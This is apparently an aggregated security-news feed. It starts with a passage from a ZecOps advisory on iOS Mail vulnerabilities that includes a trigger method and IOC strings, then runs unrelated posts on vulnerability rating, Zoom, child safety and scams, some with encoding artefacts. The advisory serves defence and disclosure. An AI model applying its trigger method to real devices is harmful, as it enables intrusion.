Since MobileMail/maild didn’t explicitly set the max limit for email size, it is possible to set up a custom email server and send an email that has several GB of plain text. iOS MIME/Message library chunks data into an average of roughly 0x100000 bytes while streaming data, so failing to download the entire email is totally fine.

Please note that this is just one example of how to trigger this vulnerability. Attackers do not need to send such email in-order to trigger this vulnerability, and other tricks with multi-part, RTF, or other formats may accomplish the same objective with a standard size email.

Indicators of Compromise

# Type of indicator Purpose IOC
1 String in raw email Part of the malicious email sent AAAAAAAA AND AAAAATEy AND EA\r\nAABI AND "$\x0e\xce\xa0\xd4\xc7\xcb\x08" AND T8hlGOo9 AND OKl2N\r\nC (updated)
3 String in raw email Part of the malicious email sent 3r0TRZfh AND AAAAAAAAAAAAAAAA AND \x0041\x0041\x0041\x0041 (unicode AAAA) (updated)
4 String in raw email Part of the malicious email sent \n/s1Caa6 AND J1Ls9RWH
5 String in raw email Part of the malicious email sent ://44449
6 String in raw email Part of the malicious email sent ://84371
7 String in raw email Part of the malicious email sent ://87756
8 String in raw email Part of the malicious email sent ://94654


Apple patched both vulnerabilities in iOS 13.4.5 beta, as can be seen in the following screenshot below:

To mitigate these issues – you can use the latest beta available. If using a beta version is not possible, consider disabling Mail application and use Outlook, Edison Mail, or Gmail that are not vulnerable.

Disclosure timeline

  • February 19th 2020 – Suspected events reported to the Vendor under ZecOps responsible disclosure policy which allows immediate release for in-the-wild triggers
  • Ongoing communication between the affected vendor & ZecOps
  • March 23rd – ZecOps sent to the affected vendor a POC reproduction of the OOB Write vulnerability
  • March 25th – ZecOps shared a local POC for the OOB Write
  • March 31st – ZecOps confirmed a second vulnerability exists in the same area and the ability of a remote trigger (Remote Heap Overflow) – both vulnerabilities were triggered in the wild
  • March 31st – ZecOps shared a POC with the affected vendor for the remote heap-overflow vulnerability
  • April 7th – ZecOps shared a custom Mail Server to trigger the 0-click heap overflow vulnerability on iOS 13.4 / 13.4.1 easily by simply adding the username & password to Mail and downloading the emails
  • April 15/16th – Vendor patches both vulnerabilities in the publicly available beta
  • April 20th – We re-analyzed historical data and found additional evidence of triggers in the wild on VIPs and targeted personas. We sent an email notifying the vendor that we will have to release this threat advisory imminently in order  to enable organizations to safeguard themselves as attacker(s) will likely increase their activity significantly now that it’s patched in the beta
  • April 22nd – Public disclosure


Q: Was the first and/or the second vulnerability exploited in the wild?

A: The suspected emails triggered code paths of both vulnerabilities in the wild, however, we think the first vulnerability (OOB Write) was triggered accidentally, and the main goal was to trigger the second vulnerability (Remote Heap Overflow).

  1. We have seen multiple triggers on the same users across multiple continents. 
  2. We examined the suspicious strings & root-cause (such as the 414141…41 events and mostly other events):
    1. We confirmed that this code path do not get randomly triggered.
    2. We confirmed the registers values did not originate by the targeted software or by the operating system.
    3. We confirmed it was not a red team exercise / POC tests.
    4. We confirmed that the controlled pointers containing 414141…41, as well as other controlled memory, were part of the data sent via email to the victim’s device.
  3. We verified that the bugs were remotely exploitable & reproduced the trigger.
  4. We saw similarities between the patterns used against at least a couple of the victims sent by the same attacker. 
  5. Where possible, we confirmed that the allocation size was intentional.
  6. Lastly, we verified that the suspicious emails were received and processed by the device – according to the stack trace and it should have been on the device / mail server. Where possible, together with the victims, we verified that the emails were deleted.

Based on the above, together with other information, we surmise that these vulnerabilities were actively exploited in the wild.

Q: Does an attacker have to trigger the first vulnerability first in order to trigger the second one?

A: No. An attacker would likely target the second vulnerability.

Q: Why are you disclosing these bugs before a full patch is available?

A: It’s important to understand the following:

  • These bugs alone cannot cause harm to iOS users – since the attackers would require an additional infoleak bug & a kernel bug afterwards for full control over the targeted device.
  • Both bugs were already disclosed during the publicly available beta update. The attackers are already aware that the golden opportunity with MobileMail/maild is almost over and they will likely use the time until a patch is available to attack as many devices as possible. 
  • With very limited data we were able to see that at least six organizations were impacted by this vulnerability – and the potential abuse of this vulnerability is enormous. We are confident that a patch must be provided for such issues with public triggers ASAP. 

It is our obligation to the public, our customers, partners, and iOS users globally to disclose these issues so people who are interested can protect themselves by applying the beta patch, or stop to use Mail and temporarily switch to alternatives that are not vulnerable to these bugs. 

We hope that with making this information public it will help to promote a faster patch.

Q: Can both vulnerabilities be triggered remotely?

A; The remote heap overflow has been proven to be possible to trigger remotely without any user-interaction (aka ‘0-click’) on iOS13. The OOB write can be triggered remotely with an additional vulnerability that allows to call an arbitrary selector, just like the one published by Google Project Zero here: – since we saw in the wild trigger for the first vulnerability, it is possible, although we think it was done by mistake (see above).

Q: Do end users require to perform any action for the exploitation to succeed?

A: On iOS 13 – no. On iOS 12 – it requires the victim to click on an email.

If an attacker controls the mail server, the attack can be performed without any clicks on iOS 12 too.

Q: Since when iOS is vulnerable to these bugs?

A: iOS is vulnerable to these bugs at least since iOS 6 (Sept’ 2012). We haven’t checked earlier versions.

Q: What can you do to mitigate the vulnerability:

A: The newly released beta update of 13.4.5 contains a patch for these vulnerabilities. If you cannot patch to this version instead of using Mail application consider to use other mail applications until a GA patch is available.

Q: Does an attacker need to send a very large email (e.g. 1-3gb)  to trigger the vulnerability?

A: No. Attackers may use tricks in multi-part / RTF, etc in order to consume the memory in a similar way without sending a large email.

Q: Does the vulnerability require additional information to succeed? 

A: Yes, an attacker would need to leak an address from the memory in order to bypass ASLR. We did not focus on this vulnerability in our research.

Q: What does the vulnerability allow:

A: The vulnerability allows to run remote code in the context of MobileMail (iOS 12) or maild (iOS 13). Successful exploitation of this vulnerability would allow the attacker to leak, modify, and delete emails. Additional kernel vulnerability would provide full device access – we suspect that these attackers had another vulnerability. It is currently under investigation.

Q: Would end users notice any abnormal behavior once either vulnerabilities are triggered / exploited?

A: Besides a temporary slowdown of mobile mail application, users should not observe any other anomalous behavior.

When the exploit fails on iOS 12 – users may notice a sudden crash of the Mail application.

On iOS13, besides a temporary slowdown, it would not be noticeable. Failed attacks would not be noticeable on iOS 13 if another attack is carried afterwards and deletes the email. In failed attacks, the emails that would be sent by the attacker would show the message: "This message has no content." As seen in the following picture below:

Q: if the attackers fail, can they re-try to attack using the same vulnerability right after? 

A: On iOS 13 – attackers may try multiple times to infect the device silently and without user interaction. On iOS 12 – additional attempt would require the user to click on a newly received email by the attackers. The victim does not need to open an attachment and just viewing the email is sufficient to trigger the attack. 

Q: Can the attackers delete the received email after it was processed by the device and triggered the vulnerability?

A: Yes

Q; Is MacOS vulnerable to these vulnerabilities too? 

A: No

Hear the news first

  • Only essential content
  • New vulnerabilities & announcements
  • News from ZecOps Research Team
We won’t spam, pinky swear 🤞

Getting Started With Tracking Hackers With HoneyBadger

Hello and welcome. My name is John Strand, and in this video, we’re going to talk a little bit about HoneyBadger. Now, in a number of other videos and a number of other things whenever you’re talking about attribution or cyber deception, you can focus on creating documents or elements that’ll beacon back and many […]

The post Getting Started With Tracking Hackers With HoneyBadger appeared first on Black Hills Information Security.

Separating the Signal from the Noise: How Mandiant Intelligence Rates Vulnerabilities — Intelligence for Vulnerability Management, Part Three

One of the critical strategic and tactical roles that cyber threat intelligence (CTI) plays is in the tracking, analysis, and prioritization of software vulnerabilities that could potentially put an organization’s data, employees and customers at risk. In this four-part blog series, FireEye Mandiant Threat Intelligence highlights the value of CTI in enabling vulnerability management, and unveils new research into the latest threats, trends and recommendations.

Every information security practitioner knows that patching vulnerabilities is one of the first steps towards a healthy and well-maintained organization. But with thousands of vulnerabilities disclosed each year and media hype about the newest “branded” vulnerability on the news, it’s hard to know where to start.

The National Vulnerability Database (NVD) considers a range of factors that are fed into an automated process to arrive at a score for CVSSv3. Mandiant Threat Intelligence takes a different approach, drawing on the insight and experience of our analysts (Figure 1). This human input allows for qualitative factors to be taken into consideration, which gives additional focus to what matters to security operations.

Figure 1: How Mandiant Rates Vulnerabilities

Assisting Patch Prioritization

We believe our approach results in a score that is more useful for determining patching priorities, as it allows for the adjustment of ratings based on factors that are difficult to quantify using automated means. It also significantly reduces the number of vulnerabilities rated ‘high’ and ‘critical’ compared to CVSSv3 (Figure 2). We consider critical vulnerabilities to pose significant security risks and strongly suggest that remediation steps are taken to address them as soon as possible. We also believe that limiting ‘critical’ and ‘high’ designations helps security teams to effectively focus attention on the most dangerous vulnerabilities. For instance, from 2016-2019 Mandiant only rated two vulnerabilities as critical, while NVD assigned 3,651 vulnerabilities a ‘critical’ rating (Figure 3).

Figure 2: Criticality of US National Vulnerability Database (NVD) CVSSv3 ratings 2016-2019 compared to Mandiant vulnerability ratings for the same vulnerabilities

Figure 3: Numbers of ratings at various criticality tiers from NVD CVSSv3 scores compared to Mandiant ratings for the same vulnerabilities

Mandiant Vulnerability Ratings Defined

Our rating system includes both an exploitation rating and a risk rating:

The Exploitation Rating is an in indication of what is occurring in the wild.

Figure 4: Mandiant Exploitation Rating definitions

The Risk Rating is our expert assessment of what impact an attacker could have on a targeted organization, if they were to exploit a vulnerability.

Figure 5: Mandiant Risk Rating definitions

We intentionally use the critical rating sparingly, typically in cases where exploitation has serious impact, exploitation is trivial with often no real mitigating factors, and the attack surface is large and remotely accessible. When Mandiant uses the critical rating, it is an indication that remediation should be a top priority for an organization due to the potential impacts and ease of exploitation.

For example, Mandiant Threat Intelligence rated CVE-2019-19781 as critical due to the confluence of widespread exploitation—including by APT41—the public release of proof-of-concept (PoC) code that facilitated automated exploitation, the potentially acute outcomes of exploitation, and the ubiquity of the software in enterprise environments.

CVE-2019-19781 is a path traversal vulnerability of the Citrix Application Delivery Controller (ADC) 13.0 that when exploited, allows an attacker to remotely execute arbitrary code. Due to the nature of these systems, successful exploitation could lead to further compromises of a victim's network through lateral movement or the discovery of Active Directory (AD) and/or LDAP credentials. Though these credentials are often stored in hashes, they have been proven to be vulnerable to password cracking. Depending on the environment, the potential second order effects of exploitation of this vulnerability could be severe.

We described widespread exploitation of CVE-2019-19781 in our blog post earlier this year, including a timeline from disclosure on Dec. 17, 2019, to the patch releases, which began a little over a month later on Jan. 20, 2020. Significantly, within hours of the release of PoC code on Jan. 10, 2020, we detected reconnaissance for this vulnerability in FireEye telemetry data. Within days, we observed weaponized exploits used to gain footholds in victim environments. On the same day the first patches were released, Jan. 20, 2020, we observed APT41, one of the most prolific Chinese groups we track, kick off an expansive campaign exploiting CVE-2019-19781 and other vulnerabilities against numerous targets.

Factors Considered in Ratings

Our vulnerability analysts consider a wide variety of impact-intensifying and mitigating factors when rating a vulnerability. Factors such as actor interest, availability of exploit or PoC code, or exploitation in the wild can inform our analysis, but are not primary elements in rating.

Impact considerations help determine what impact exploitation of the vulnerability can have on a targeted system.

Impact Type

Impact Consideration

Exploitation Consequence

The result of successful exploitation, such as privilege escalation or remote code execution

Confidentiality Impact

The extent to which exploitation can compromise the confidentiality of data on the impacted system

Integrity Impact

The extent to which exploitation allows attackers to alter information in impacted systems

Availability Impact

The extent to which exploitation disrupts or restricts access to data or systems

Mitigating factors affect an attacker’s likelihood of successful exploitation.

Mitigating Factor

Mitigating Consideration

Exploitation Vector

What methods can be used to exploit the vulnerability?

Attacking Ease

How difficult is the exploit to use in practice?

Exploit Reliability

How consistently can the exploit execute and perform the intended malicious activity?

Access Vector

What type of access (i.e. local, adjacent network, or network) is required to successfully exploit the vulnerability?

Access Complexity

How difficult is it to gain access needed for the vulnerability?

Authentication Requirements

Does the exploitation require authentication and, if so, what type of authentication?

Vulnerable Product Ubiquity

How commonly is the vulnerable product used in enterprise environments?

Product's Targeting Value

How attractive is the vulnerable software product or device to threat actors to target?

Vulnerable Configurations

Does exploitation require specific configurations, either default or non-standard?

Mandiant Vulnerability Rating System Applied

The following are examples of cases in which Mandiant Threat Intelligence rated vulnerabilities differently than NVD by considering additional factors and incorporating information that either was not reported to NVD or is not easily quantified in an algorithm.


Vulnerability Description

NVD Rating

Mandiant Rating



A command injection vulnerability in the Web UI component of Cisco IOS XE versions 16.11.1 and earlier that, when exploited, allows a privileged attacker to remotely execute arbitrary commands with root privileges



This vulnerability was rated high by NVD, but Mandiant Threat Intelligence rated it as low risk because it requires the highest level of privileges – level 15 admin privileges – to exploit. Because this level of access should be quite limited in enterprise environments, we believe that it is unlikely attackers would be able to leverage this vulnerability as easily as others. There is no known exploitation of this activity.


A use after free vulnerability within the FileReader component in Google Chrome 72.0.3626.119 and prior that, when exploited, allows an attacker to remotely execute arbitrary code. 




NVD rated CVE-2019-5786 as medium, while Mandiant Threat Intelligence rated it as high risk. The difference in ratings is likely due to NVD describing the consequences of exploitation as denial of service, while we know of exploitation in the wild which results in remote code execution in the context of the renderer, which is a more serious outcome.

As demonstrated, factors such as the assessed ease of exploitation and the observance of exploitation in the wild may result a different priority rating than the one issued by NVD. In the case of CVE-2019-12650, we ultimately rated this vulnerability lower than NVD due to the required privileges needed to execute the vulnerability as well as the lack of observed exploitation. On the other hand, we rated the CVE-2019-5786 as high risk due to the assessed severity, ubiquity of the software, and confirmed exploitation.

In early 2019, Google reported two zero-day vulnerabilities were being used together in the wild: CVE-2019-5786 (Chrome zero-day vulnerability) and CVE-2019-0808 (a Microsoft privilege escalation vulnerability). Google quickly released a patch for the Chrome vulnerability pushed it to users through Chrome’s auto-update feature on March 1. CVE-2019-5786 is significant because it can impact all major operating systems, Windows, Mac OS, and Linux, and requires only minimal user interaction, such as navigating or following a link to a website hosting exploit code, to achieve remote code execution. The severity is further compounded by a public blog post and proof of concept exploit code that was released a few weeks later and subsequently incorporated into a Metasploit module.

The Future of Vulnerability Analysis Requires Algorithms and Human Intelligence

We expect that the volume of vulnerabilities to continue to increase in coming years, emphasizing the need for a rating system that accurately identifies the most significant vulnerabilities and provides enough nuance to allow security teams to tackle patching in a focused manner. As the quantity of vulnerabilities grows, incorporating assessments of malicious actor use, that is, observed exploitation as well as the feasibility and relative ease of using a particular vulnerability, will become an even more important factor in making meaningful prioritization decisions.

Mandiant Threat Intelligence believes that the future of vulnerability analysis will involve a combination of machine (structured or algorithmic) and human analysis to assess the potential impact of a vulnerability and the true threat that it poses to organizations. Use of structured algorithmic techniques, which are common in many models, allows for consistent and transparent rating levels, while the addition of human analysis allows experts to integrate factors that are difficult to quantify, and adjust ratings based on real-world experience regarding the actual risk posed by various types of vulnerabilities.

Human curation and enhancement layered on top of automated rating will provide the best of both worlds: speed and accuracy. We strongly believe that paring down alerts and patch information to a manageable number, as well as clearly communicating risk levels with Mandiant vulnerability ratings makes our system a powerful tool to equip network defenders to quickly and confidently take action against the highest priority issues first.

Register today to hear FireEye Mandiant Threat Intelligence experts discuss the latest in vulnerability threats, trends and recommendations in our upcoming April 30 webinar.

Keeping Virtual Play Dates, Hang Outs, and Video Chats Safe for Everyone

virtual play date

Every day we discover (or stumble over) new ways of coping and connecting during this unique chapter in family life. Still, as every age group under your roof finds their favorite virtual play date and hangout apps, parents may need to add a few safety rails to make sure the fun stays fun.

IRL community resurfaces

virtual play date

While this health crisis is devastating in so many ways, it’s also put a spotlight on the many heartwarming ways to connect in real life (IRL). We’re placing teddy bears in our windows for solidarity, creating scavenger hunts for neighborhood kids, serenading shut-ins, publically supporting first responders, celebrating birthdays and graduations with drive-by parades, and so, so much more.

The ongoing infusion of true, human connection has softened the uncertainty. Still, kids of every age need to maintain an emotional connection with peers. Here are a few things to think about as kids of every age connect with friends online.

Pre-K and Elementary Virtual Play Dates

Since health experts have put restrictions on familiar fun for little ones such as playgrounds, sports leagues, sleepovers, playdates, and even visits with grandparents, parents are relaxing screen time rules and looking for ways to have virtual playdates. Free video tools such as FaceTime and Zoom are proving lifesavers for group art, play, and learning, as are safe websites for young ones and phone apps. (If you run out things to do, here’s a great list of fun to tap and great learning sites for every age group).

Keep Them Safe

  • Share online experiences with young children at all times. Sit with them to teach, monitor, and explain the context of new digital environments. Also, keep computers and phones in a common area.
  • Try to keep screen time brief. Even young kids can become too screen-reliant.
  • Maximize privacy settings on all devices and turn on and safe mode or search on websites and apps.
  • Introduce concepts such as cyberbullying and strangers in age-appropriate language.
  • Start family security efforts early. Consider the benefits of filtering software, safe browsing, and encrypting your family’s digital activity with a Virtual Private Network (VPN).

Middle and High Schooler Virtual Hang Outs

While screen time has spiked, digital connection while homebound is also essential for tweens and teens for both learning and peer relationships. Kids finding their new virtual hangouts on social networks, group chats, and video games. They are also playing virtual board games using sites such as Pogo, Let’s Play Uno, and Zoom. Netflix Party has become a fun way to watch Netflix with groups of friends.

Keep Them Safe

  • At this age many kids (own or will soon own) a smartphone. With increased time online, you may want to review the basics, such as privacy and location settings. This includes gaming devices.
  • With increased internet use and most schools closed for the year, using parental control software and gaming security software can help parents reduce online risks for children of all ages.
  • Be aware of and talk about trending, risky digital behaviors, and challenges that can surface on apps such as TikTok, and WhatsApp.
  • Review and approve games and apps before they are downloaded and consider monitoring your children’s devices as well as social profiles and posts.
  • This age group is quick to jump on public wifi, which puts your family’s data at risk. Exploring using a family VPN is critical for this age group.
  • Discuss the danger of connecting with strangers online. Also, discuss the risks of oversharing personal information and photos, even in seemingly private chats and texts. Don’t let boredom lead to bad choices.
  • Discuss cyberbullying and how to block and report accounts that express hateful, racist, or threatening behavior.
  • Coach your kids on using strong passwords and how to verify legitimate websites and identity online scams.

There’s nothing normal for families about this time, but there is something special. Grab it. Keep talking and laughing, especially on the hard days. Have a daily “heart check-in” with your teen if he or she seems to be isolating. Give one another space for topsy turvy moods. And, don’t forget parents, before this is all over, be sure to nail that TikTok dance with your kids and share it with the world!

The post Keeping Virtual Play Dates, Hang Outs, and Video Chats Safe for Everyone appeared first on McAfee Blogs.

7 Common Questions about CPEs During COVID-19

Continuing professional education is an important component of PCI SSC Qualification. Staying up to date, even during the COVID-19 pandemic, with the latest knowledge, techniques, and insights helps support the Program Participant’s ability to effectively conduct the tasks and responsibilities associated with a PCI SSC Qualification.

Applicants Webinar: NICE Notice of Funding Opportunity (NOFO) – K12 Cybersecurity Outreach Program

The PowerPoint slides used during this webinar can be downloaded here. Speakers: Rodney Petersen Director, National Initiative for Cybersecurity Education (NICE) Davina Pruitt-Mentle Lead for Academic Engagement, National Initiative for Cybersecurity Education (NICE) Gilbert Castillo Grants Officer National Institute of Standards and Technology (NIST) Synopsis: NIST recently announced funding on behalf of the National Initiative for Cybersecurity Education (NICE) for the NICE K12 Cybersecurity Education Outreach Program. NIST is soliciting applications from U.S.-located, non-Federal entities

Cyber News Rundown: Ransomware Wrecks Florida City

Reading Time: ~ 2 min.

Florida City Sees Lasting Effects of Ransomware Attack

Nearly three weeks after the City of Jupiter, Florida suffered a ransomware attack that took many of their internal systems offline, the city has yet to return to normal. City officials announced they would be working to rebuild their systems from backups, rather than paying any ransom, and were able to get their main website up and running again, along with many essential services. The timing of the attack couldn’t have been worse, as most of the City’s staff were under lockdown and unable to access compromised machines in a quick and safe manner.

Hackers Breach San Francisco International Airport

Late last Month, Russia-based hackers attempted to breach the internal networks of San Francisco International Airport using a simple injection script to obtain employee credentials. By forcing the use of the SMB file-sharing protocol, the hackers could quickly grab the usernames and hashed passwords, which would then allow them to deploy any number of malicious payloads or access extremely sensitive information. Shortly after the attack was detected and subsequently ended, the IT staff issued a forced password reset for all staff in hopes of minimizing any further damage.

Critical Exploits Patched by Microsoft

Recently, Microsoft patched three zero-day exploits that could allow remote code execution, privilege increases, and even creating new accounts with full OS permissions. Two of the patched flaws related to the Adobe Type Manager Library and were functional on multiple Windows® operating systems, but performed different tasks based on the environment in which they were deployed.  

DDoS Suspect Arrested in Netherlands

Two Dutch government websites that were created to distribute information related to the COVID-19 pandemic fell victim to a DDoS attack for several hours. Dutch authorities, who have been heavily involved in many cybersecurity operations, have arrested at least one suspect and shut down 15 sites offering DDoS services. Hopefully, the shutdowns will help reduce the number of these types of attacks going forward.

RagnarLocker Takes Down Portuguese Energy

One of the largest energy providers in Europe, Energias de Portugal (EDP), became the victim of a ransomware attack that used the RagnarLocker variant. In exchange for the estimated 10TB of data stolen during the attack, attackers demanded a ransom of $10.9m to be paid in cryptocurrency. The authors behind RagnarLocker have already begun posting segments of the stolen data to their main website, along with the promise to release the rest and make their entire client list aware of the breach, if the ransom isn’t met.

The post Cyber News Rundown: Ransomware Wrecks Florida City appeared first on Webroot Blog.

Weekly Update 187

Weekly Update 187

Spiders! Ok, not your normal start to a weekly update but yeah, we had a bit of an infestation this week which did take the mind of other current events for a while. Much of what's happened beyond that this week has resulted in various tweet storms; the Zoom credential stuffing situation, the Coronavirus tracking app (holy cow that has some "robust" debate around it) and the (seemingly endless) thread of progress as I build up my Ubiquiti network. All that and more in the vid below ?

Weekly Update 187
Weekly Update 187
Weekly Update 187
Weekly Update 187


  1. If you don't like spiders then don't click this link (wonder how many of them are still crawling around in the air conditioning unit...)
  2. No, there isn't a "Zoom data breach" and yes, people keep using shitty passwords (c'mon media, it's not hard to report on this accurately!)
  3. The Coronavirus tracking app tweet storm (less than a day on and apparently, it's had 125k impressions so it's clearly getting some traction, but it's divisive)
  4. Speaking of tweet storms, check out my Ubiquiti build! (this project has brought me so much joy ?)
  5. The Icelandic government is now on Have I Been Pwned (they're the 10th national government to have full access to query their gov domains)
  6. Sponsored by: SecurityFWD. A brand new YouTube show from Varonis. Watch Episode 1: How Far can Wi-Fi Travel?

Application Security? But I Have a WAF!

Updated 4/16/2020. Originally published 12/28/2016.

It seems so tempting. Solve your application security problem by throwing an appliance at it. After all, if web applications are the most common form of attack, why not just protect them the same way you protect your network and email servers, and be done with it? Why should you spend timeツ?hunting down vulnerabilitiesツ?in your code and figuring out how to fix them?

The ???appliance throwing??? approach would be viable if web application firewalls (WAFs) were perfect, but protecting your app layer with only a WAF leaves a lot of holes. WAFs, at their heart, are black-box protection technologies that rely on inspecting incoming traffic for known attack patterns ??? and that???s often not enough. There are circumstances where WAFs will leave you vulnerable to attack, for instance:


Missed attack due to new patterns

A WAF tries to use known attack patterns to protect an application. It can be tuned via writing rules, but attackers are coming up with new patterns all the time. In fact, creating WAF bypasses is something of a cottage industry for security researchers, to the point thatツ?you can download cheat sheets for creating WAF bypasses from security researchers like @Pentestit_ru and @themiddleblue, the editor-in-chiefツ?from 1337pwn, or the well-known OWASP foundation.

And that???s not even including the risk of new vulnerability categories. Veracode Community member Mark Merkow from HealthEquity notes, ???Even if a WAF is configured 100 percent correctly and catches and stops attacks it knows about successfully and every time, it's still at risk for letting new attacks through, including zero-day attacks. With Web Services and API communications as the most likely future form for all apps, WAFs will become less and less useful. What will survive in this new world are well-written, high-quality, resilient applications that can stand up to endless attacks.???


Missed attack due to application changes

Based on the results of a penetration test or other evaluation of an application, you can make a WAF very accurate by creating rules that focus on specific input fields and types of vulnerability. However, you have to maintain these rules every time the application is changed. The SANS Institute notes, "During the WAF deployment, everyone involved understands exactly which form fields and inputs are vulnerable and to which attack categories but, over time, this knowledge fades.ツ?Many organizations lack the in-house expertise to conduct penetration tests every time they change the web application or WAF configurationツ?(and miss the opportunity to ensure a vulnerability was not introduced).???

SANS issued this report over five years ago. In the intervening years, the frequency of application updates has only gotten higher thanks to increased adoption of agile software development and DevOps. This means that the window of time during which a WAF configuration should not require updates due to application changes has dramatically decreased.


Missed attack due to configuration complexity

The same SANS report notes that it???s not uncommon for WAFs to be extended to cover more applications than they can handle, to fail under high load, or to have a high number of false positives. For this reason, some organizations configure their WAFs to alert only in the event of a potential attack, rather than try to block it ??? which means that a successful attack will likely be missed in the midst of other alerts from the WAF.

There are definitely still benefits to deploying WAFs, including avoidance of denial of service attacks and???when properly configured??? some protection against an attack. If nothing else, they slow an attacker down.


No application security silver bullet

Effective application security requires multiple technologies that protect apps in different ways and in different stages of their lifecycle. As Veracode Community member, Glico Man, said in a recent comment, ???WAF is a ???safety net??? and may provide ???virtual patching??? until the application code is fixed??ヲ A well-configured WAF will provide more time for a developer to fix their code.???

If you???re going to use a WAF, you won???t be protecting your products from attack indefinitely. So use the time a WAF gives you wisely; figure out where the underlying vulnerabilities are in your application and fix them. For instance, consider an automated application security solution that integrates into your SDLC, allowing developers to find and remediate security-related defects early in the development process.


Cyberattackers are increasingly focused on the application layer; it???s critical to understand both how this layer is being exploited, and which solutions protect it most effectively. To learn more about application security solutions and where to start, check out the Ultimate Guide to Getting Started With AppSec or visit the Veracode Community page. ツ?


Due to the scale of the pandemic ever more businesses and governments institutions are enforcing ‘work from home’ policies in order to keep their employees safe and healthy, and to keep the business going – Social interactions today come down to video calls, social media posts, communicating via instant messaging platforms and for very many of us we make use of Zoom.

In this context, a cyberattack that deprives organisations and families of access to the internet, their devices or data could be devastating – Zoom has had a bunch of security scares recently, as huge numbers of new users flock to it, and as cybercriminals try to take advantage of that. Fortunately, a lot of the problems and risks people are having can be reduced enormously just by getting the basics right.

So here are “things to get right first” – they shouldn’t take you long, and they are easy to do to keep your Zoom safer.

1. Pick the right password.
When setting up Zoom Account its highly recommended to make use of good and strong password – Do not share it, change it as often as you can, make sure you do not reuse the password.

2. Patch early, patch often
Zoom’s own CEO just wrote a blog post announcing a “feature freeze” in the product so that the company can focus on security issues instead. It’s much easier to do that if you aren’t adding new code at the same time.

Why not get into the habit of checking you’re up-to-date every day, before your first meeting? Even if Zoom itself told you about an update the very last time you used it, get in the habit of checking by hand anyway, just to be sure. It doesn’t take long.

3. Use the Waiting Room option
Set up meetings so that the participants can’t join in until you open it up.
And if you suddenly find yourself “on hold until the organiser starts the meeting” when in the past you would have spent the time chatting to your colleagues and getting the smalltalk over with, don’t complain – those pre-meeting meetings are great for socialising but they do make it harder to control the meeting.

4. Take control over screen sharing
Until recently, most Zoom meetings took a liberal approach to screen sharing. Unfortunately this can cause other to share inappropriate things and cause troubles
Actually, it’s not just screen sharing that can cause trouble. There are numerous controls you can apply to participants in meetings, including blocking file sharing and private chat, kicking out disruptive users, and stopping troublemakers coming back.

5. Use random meeting IDs and set meeting passwords
We know lots of Zoom users who memorised their own meeting ID long ago and had fallen into the habit of using it for every meeting they held – even back-to-back meetings with different groups – because they knew they’d never need to look it up.

But that convenience is handy for crooks, too, because they already have a list of known IDs that they can try automatically in the hope of wandering in where they aren’t supposed to be.

It is recommended using a randomly generated meeting ID, and setting a password on any meeting that is not explicitly open to all. You can send the web link by one means, e.g. in an email or invitation request, and the password by another means, e.g. in an instant message just before the meeting starts. (You can also lock meetings once they start to avoid gaining unwanted visitors after you’ve started concentrating on the meeting itself.)

6. Make some rules of etiquette and stick to them.
Etiquette may sound like a strange bedfellow for cybersecurity, and perhaps it is.
But respect for privacy, a sense of trust, and a feeling of social and business comfort are also important parts of a working life that’s now dominated by online meetings.
If you’re expected or you need to use video, pay attention to your appearance and the lighting. (In very blunt terms: try to avoid being a pain to watch.) Remember to use the mute button when you can.

And most importantly – especially if there are company outsiders in the meeting – be very clear up front if you will be recording the meeting, even if you are in a jurisdiction that does not require you to declare it. And make it clear if they are any restrictions, albeit informal ones, about what the participants are allowed to do with the information they learn in the meeting.

Etiquette isn’t about keeping the bad guys out. But respectful rules of engagement for remote meetings help to make it easy for everyone in the meeting to keep the good stuff in.

Welcoming the Icelandic Government to Have I Been Pwned

Welcoming the Icelandic Government to Have I Been Pwned

Hot on the heels of onboarding the USA government to Have I Been Pwned last month, I'm very happy to welcome another national government - Iceland! As of today, Iceland's National Computer Security Incident Response Team (CERT-IS), now has access to the full gamut of their gov domains for both on-demand querying and ongoing monitoring.

As with the USA and Iceland, I expect to continue onboarding additional governments over the course of 2020 and expanding their access to meaningful data about breaches that impact their departments.

NICE Webinar: The Role of the School Counselor in Promoting Cybersecurity Career Opportunities

The PowerPoint slides used during this webinar can be downloaded here. Speakers: Jill Cook Assistant Director, American School Counselor Association Dr. Samantha Haviland Director of School Counseling, Denver Public Schools Nwakaego Oriji School Counselor Facilitator, Garland Independent School District Amy Dauble-Madigan School Counselor, El Marino Language School Synopsis: The role of the school counselor has evolved over the past two decades, including ensuring that students are equipped with information about educational and career options in cybersecurity and other STEM-related fields

The Latest Mobile Scams & How To Stay Safe

If the challenges of working from home, connecting with family, and keeping on top of the news have you grabbing your phone more than ever, you’re not alone. Unfortunately, scammers are capitalizing on this opportunity. From fake apps, and dangerous text messages to phishing phone calls, mobile scams are multiplying, potentially putting your personal data and devices at risk.

In fact, the Federal Trade Commission recently warned that they received a spike in user complaints as fraudsters look to take advantage of the current state of affairs. Fortunately, there are a few things you can do to protect your privacy and security.

But first, here are a few things to watch out for:

Fake Apps

Looking for apps to help you track health information and find supplies? The scammers have you covered. They’ve released a number of malicious health-related apps designed to track you instead. These phony apps may ask for access to your photos, files, and location, or use spyware that can remotely turn on your camera or microphone.

One dodgy app offers to help you locate N-95 masks, but don’t download it. If you do, the app locks your device and demands a ransom to unlock it. This just shows how common forms of attack, like ransomware, evolve with current events.

Another handful of phony apps making the rounds appear to be for popular video conferencing platform Zoom, which has seen exponential growth as more people work from home. But installing these phony apps can download malware instead, so make sure you go to the official company’s app.

Risky Text Messages

Phishing by text message, or “smishing,” continues to be a popular way to hook mobile users. The scammers are usually trying to get you to click on a link, which sends you to a risky website or downloads malware onto your device. We’ve seen recent smishing attempts asking to verify personal and banking information in order to “release” government stimulus funds or consolidate debt. Others attempt to sell you in-demand medical supplies at a discount, such as surgical masks, or fake health insurance.

Sometimes the senders will “spoof” a government or business phone number, so it appears to come from an official entity. Just remember that governments and banks will never contact you directly, asking for personal information or money.

Phishing Calls

With voice-over-internet technology making robocalls cheap and easy, the scammers can’t help but inundate us with new topical scams. We’ve seen reports of robocalls offering phony medical treatments or free test kits if you respond with your information. Others like

charity requests, such as one that appears to come from the World Health Organization, asking for a donation to an emergency relief fund.

How to Stay Safe

Scammers always try to take advantage of uncertainty and big news events that capture our attention. Here’s how to stay safe:

Be hyperaware when receiving any type of call or message

Always be suspicious of unsolicited calls, texts, social media messages, and e-mails. If you question the identity of the person, it is best not to interact at all. If a suspicious message appears to come from a friend, call them directly to see if their phone was hacked. Do not click on links or open attachments from anyone unless you’re sure the communication is authentic.

Never share your personal or financial data

Never give your personal and financial information over the phone or via text. If you are pressured to do so, go directly to the source.  Call the supposed institution asking for your information directly.

